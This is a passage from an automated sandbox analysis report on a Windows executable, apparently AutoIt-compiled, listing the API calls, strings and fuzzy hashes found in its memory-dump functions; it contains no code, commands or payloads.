                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: static
                                              • API String ID: 2559357485-2160076837
                                              • Opcode ID: 35707571c8a4049822fee9f570a8ef02d74fd7ad13b332d8c5e0d62159997c64
                                              • Instruction ID: b047481bed092e0247e89491e51342982fa342ec871465ee2714490fde789d12
                                              • Opcode Fuzzy Hash: 35707571c8a4049822fee9f570a8ef02d74fd7ad13b332d8c5e0d62159997c64
                                              • Instruction Fuzzy Hash: 28314772104214AFDF129F64DC09FEA3B6EEF0A764F110228FA15E61A0C731EC21DBA4
                                              APIs
                                              • _memset.LIBCMT ref: 00366E3E
                                                • Part of subcall function 00368B28: __getptd_noexit.LIBCMT ref: 00368B28
                                              • __gmtime64_s.LIBCMT ref: 00366ED7
                                              • __gmtime64_s.LIBCMT ref: 00366F0D
                                              • __gmtime64_s.LIBCMT ref: 00366F2A
                                              • __allrem.LIBCMT ref: 00366F80
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00366F9C
                                              • __allrem.LIBCMT ref: 00366FB3
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00366FD1
                                              • __allrem.LIBCMT ref: 00366FE8
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00367006
                                              • __invoke_watson.LIBCMT ref: 00367077
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                              • String ID:
                                              • API String ID: 384356119-0
                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                              • Instruction ID: 63fe0e407e3f9aab3eab1a28dc02c798cc23de3780d2f8a4bca129e48f47208b
                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                              • Instruction Fuzzy Hash: 0C712776A00717ABD726EF78DC42B6AB3A8AF04364F10C229F514DB285E775ED0087D0
                                              APIs
                                              • _memset.LIBCMT ref: 003A2542
                                              • GetMenuItemInfoW.USER32(00405890,000000FF,00000000,00000030), ref: 003A25A3
                                              • SetMenuItemInfoW.USER32(00405890,00000004,00000000,00000030), ref: 003A25D9
                                              • Sleep.KERNEL32(000001F4), ref: 003A25EB
                                              • GetMenuItemCount.USER32(?), ref: 003A262F
                                              • GetMenuItemID.USER32(?,00000000), ref: 003A264B
                                              • GetMenuItemID.USER32(?,-00000001), ref: 003A2675
                                              • GetMenuItemID.USER32(?,?), ref: 003A26BA
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003A2700
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A2714
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A2735
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                              • String ID:
                                              • API String ID: 4176008265-0
                                              • Opcode ID: eacb7c5234d182423b62311f994b890ee150f8377103e118a06ed4f75eaea941
                                              • Instruction ID: b95a47205276f14b23710dedd83759b433c2717eb894ffcb2b8d2a58c8f537c5
                                              • Opcode Fuzzy Hash: eacb7c5234d182423b62311f994b890ee150f8377103e118a06ed4f75eaea941
                                              • Instruction Fuzzy Hash: 68617E70901249AFDB13CF68DD88DBFBBB9FB46304F150069E941A7261D771AE05DB21
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003C6FA5
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003C6FA8
                                              • GetWindowLongW.USER32(?,000000F0), ref: 003C6FCC
                                              • _memset.LIBCMT ref: 003C6FDD
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003C6FEF
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003C7067
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow_memset
                                              • String ID:
                                              • API String ID: 830647256-0
                                              • Opcode ID: 075c66e2b664a909f7cf6d3d82a08d62941d820e9db9917ec5f6f3382156b4aa
                                              • Instruction ID: dbe5d898dfed1ecdeb4e1bf761b0374dd5cb07be4e9d7bb459d2d9923ed2c70c
                                              • Opcode Fuzzy Hash: 075c66e2b664a909f7cf6d3d82a08d62941d820e9db9917ec5f6f3382156b4aa
                                              • Instruction Fuzzy Hash: DC612575900208AFDB12DFA4CD81FAE77B8EB09710F14416AFA14EB2A1C771AD51DFA4
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00396BBF
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00396C18
                                              • VariantInit.OLEAUT32(?), ref: 00396C2A
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00396C4A
                                              • VariantCopy.OLEAUT32(?,?), ref: 00396C9D
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00396CB1
                                              • VariantClear.OLEAUT32(?), ref: 00396CC6
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00396CD3
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00396CDC
                                              • VariantClear.OLEAUT32(?), ref: 00396CEE
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00396CF9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 0dec09fe181b2ef052c1e603d985c41d434d0c30935b3177feb7863866e665c4
                                              • Instruction ID: 5be6d5ba901adb7eaa02ecac96095fdce9503d7d0304b3853425f9c758982808
                                              • Opcode Fuzzy Hash: 0dec09fe181b2ef052c1e603d985c41d434d0c30935b3177feb7863866e665c4
                                              • Instruction Fuzzy Hash: BC415E71A002199FCF06EFA9D845DAEBBB9EF08354F008069F955EB261DB30A945CF90
                                              APIs
                                              • WSAStartup.WSOCK32(00000101,?), ref: 003B5793
                                              • inet_addr.WSOCK32(?,?,?), ref: 003B57D8
                                              • gethostbyname.WSOCK32(?), ref: 003B57E4
                                              • IcmpCreateFile.IPHLPAPI ref: 003B57F2
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003B5862
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003B5878
                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003B58ED
                                              • WSACleanup.WSOCK32 ref: 003B58F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: fee3a3a5c803eba42662a53d0ee11d40e5af9739ca437157202d692ca17612c6
                                              • Instruction ID: 36628747b76c664398c8cba7019e1e6cd326a5a44e9901fac8e7e1c7e45239e1
                                              • Opcode Fuzzy Hash: fee3a3a5c803eba42662a53d0ee11d40e5af9739ca437157202d692ca17612c6
                                              • Instruction Fuzzy Hash: 955171316047009FDB12EF25DC46B6AB7E8EF48714F05492AFA56DB6A1DB70E800DF52
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 003AB4D0
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003AB546
                                              • GetLastError.KERNEL32 ref: 003AB550
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 003AB5BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: b6f8e34d88b4a5e424b242ebfb3cfb3ae1afd7dc4995968ffc70fbab0e14bd60
                                              • Instruction ID: 5a170e2afe5cb79cc1f410d4ac8b507a33b49f07de32578dc28d46858039c882
                                              • Opcode Fuzzy Hash: b6f8e34d88b4a5e424b242ebfb3cfb3ae1afd7dc4995968ffc70fbab0e14bd60
                                              • Instruction Fuzzy Hash: 83316035E002099FCB16DBA8C845EBEBBB8EF4B310F154166E505DB292DB71AA42CB51
                                              APIs
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00399014
                                              • GetDlgCtrlID.USER32 ref: 0039901F
                                              • GetParent.USER32 ref: 0039903B
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0039903E
                                              • GetDlgCtrlID.USER32(?), ref: 00399047
                                              • GetParent.USER32(?), ref: 00399063
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00399066
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: 028bcc1afa895cf7558a128a14ce5fe5208b21f52ddda1d60f0377bf9b0ba568
                                              • Instruction ID: 88f8004a481a7719fa3215d966ffea81ec4db5a320d420626277568bf7e54843
                                              • Opcode Fuzzy Hash: 028bcc1afa895cf7558a128a14ce5fe5208b21f52ddda1d60f0377bf9b0ba568
                                              • Instruction Fuzzy Hash: 65219B75E00108BFDF06ABA4CC85EFEB7B9EF49310F10415AF5619B2A1DB755825DB20
                                              APIs
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003990FD
                                              • GetDlgCtrlID.USER32 ref: 00399108
                                              • GetParent.USER32 ref: 00399124
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00399127
                                              • GetDlgCtrlID.USER32(?), ref: 00399130
                                              • GetParent.USER32(?), ref: 0039914C
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0039914F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: d9f9c754aded1eed0e0b049011167e0a2afef0ffcccd79c83c0ac35501a48a4d
                                              • Instruction ID: d533b781a16a531ce7c48b61d68e13a2f4a44f2f6cd4130a96457888641bf104
                                              • Opcode Fuzzy Hash: d9f9c754aded1eed0e0b049011167e0a2afef0ffcccd79c83c0ac35501a48a4d
                                              • Instruction Fuzzy Hash: 1621B675A00109BFDF02ABA4CC85EFEBBB9EF49300F10411AF5519B3A2DB755815DB21
                                              APIs
                                              • GetParent.USER32 ref: 0039916F
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00399184
                                              • _wcscmp.LIBCMT ref: 00399196
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00399211
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend_wcscmp
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1704125052-3381328864
                                              • Opcode ID: 47e2321728f7c5905ccca153fb94f611036dee6de87c5ca409acf2ebb4c37486
                                              • Instruction ID: 958137ad29088aa597d343349a24efbb244c0353144134d7e801d2812c651800
                                              • Opcode Fuzzy Hash: 47e2321728f7c5905ccca153fb94f611036dee6de87c5ca409acf2ebb4c37486
                                              • Instruction Fuzzy Hash: 3311CA3A24870BB9FE232728DC06EF7379C9B15760B21442BFA00E54D6EFA268615A54
                                              APIs
                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003A7A6C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ArraySafeVartype
                                              • String ID:
                                              • API String ID: 1725837607-0
                                              • Opcode ID: ba922e6f54af62a9efe27091a41e9b0bb2160f4016f2710affb0ad50c4ded1aa
                                              • Instruction ID: 9ec6aa3c4f5a3f4968195dc38e9f37546e79b260b056a7e05e5c3a3dcff87197
                                              • Opcode Fuzzy Hash: ba922e6f54af62a9efe27091a41e9b0bb2160f4016f2710affb0ad50c4ded1aa
                                              • Instruction Fuzzy Hash: 4EB16C71A0421A9FDB12DFA4CCC5BBEB7B9EF0A321F254429E541EB251D734E941CBA0
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 003A11F0
                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003A0268,?,00000001), ref: 003A1204
                                              • GetWindowThreadProcessId.USER32(00000000), ref: 003A120B
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003A0268,?,00000001), ref: 003A121A
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 003A122C
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003A0268,?,00000001), ref: 003A1245
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003A0268,?,00000001), ref: 003A1257
                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003A0268,?,00000001), ref: 003A129C
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003A0268,?,00000001), ref: 003A12B1
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003A0268,?,00000001), ref: 003A12BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                              • String ID:
                                              • API String ID: 2156557900-0
                                              • Opcode ID: 2d9c64ab200b4c0040f7c00c7f2642a0b09440c2e626c767293be912c76fde93
                                              • Instruction ID: 5a0588a36a2950158dc77ca2d6fdd3fedcd0209b6c42dc3b055e3ed5334bf36b
                                              • Opcode Fuzzy Hash: 2d9c64ab200b4c0040f7c00c7f2642a0b09440c2e626c767293be912c76fde93
                                              • Instruction Fuzzy Hash: 0D310F75600204FFFB229F50EE88F6A37AEEB56351F124525FE01E62A0D3B4ED508B64
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0034FAA6
                                              • OleUninitialize.OLE32(?,00000000), ref: 0034FB45
                                              • UnregisterHotKey.USER32(?), ref: 0034FC9C
                                              • DestroyWindow.USER32(?), ref: 003845D6
                                              • FreeLibrary.KERNEL32(?), ref: 0038463B
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00384668
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: 2b4eb1ff056c197fad66da1551912d746f9de48832986b9231f5a2254fc4ed2b
                                              • Instruction ID: 43795fb01d298621d0bcee262aa5de89b0003b1220b3bdbb19fbad8c2f7fb1fc
                                              • Opcode Fuzzy Hash: 2b4eb1ff056c197fad66da1551912d746f9de48832986b9231f5a2254fc4ed2b
                                              • Instruction Fuzzy Hash: 19A14A31701212CFCB2AEF14C995E69F7A5AF05710F5542ADE80AAF662DB30ED16CF90
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$_memset
                                              • String ID: ,,=$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2862541840-1434771687
                                              • Opcode ID: 925ff1cc4f11a455b0cdd31462d037e00887768e1fb18218f7e2ba93e803a917
                                              • Instruction ID: 798e4cd7f962c8520993221db61e8b4b8d15652c12db27229424a761ea8fa032
                                              • Opcode Fuzzy Hash: 925ff1cc4f11a455b0cdd31462d037e00887768e1fb18218f7e2ba93e803a917
                                              • Instruction Fuzzy Hash: E0919131E00219ABDF26CFA5C848FEEBBB8EF45714F11855AF715AB680D7709940CBA0
                                              APIs
                                              • EnumChildWindows.USER32(?,0039A439), ref: 0039A377
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ChildEnumWindows
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                              • API String ID: 3555792229-1603158881
                                              • Opcode ID: 020269696cb43aec0efd8b5daaf4cecb5e5004d752ed3febd03666b0ed0d75c3
                                              • Instruction ID: 07f0b68ce8287894ca591130f96b3d54b7c24f8a825259240fc0200ed506960c
                                              • Opcode Fuzzy Hash: 020269696cb43aec0efd8b5daaf4cecb5e5004d752ed3febd03666b0ed0d75c3
                                              • Instruction Fuzzy Hash: 7691DC31A00A05ABCF0ADFA0C482BEEF7B4FF04300F558619D999AB151DF316959DBD1
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 00342EAE
                                                • Part of subcall function 00341DB3: GetClientRect.USER32(?,?), ref: 00341DDC
                                                • Part of subcall function 00341DB3: GetWindowRect.USER32(?,?), ref: 00341E1D
                                                • Part of subcall function 00341DB3: ScreenToClient.USER32(?,?), ref: 00341E45
                                              • GetDC.USER32 ref: 0037CD32
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0037CD45
                                              • SelectObject.GDI32(00000000,00000000), ref: 0037CD53
                                              • SelectObject.GDI32(00000000,00000000), ref: 0037CD68
                                              • ReleaseDC.USER32(?,00000000), ref: 0037CD70
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0037CDFB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
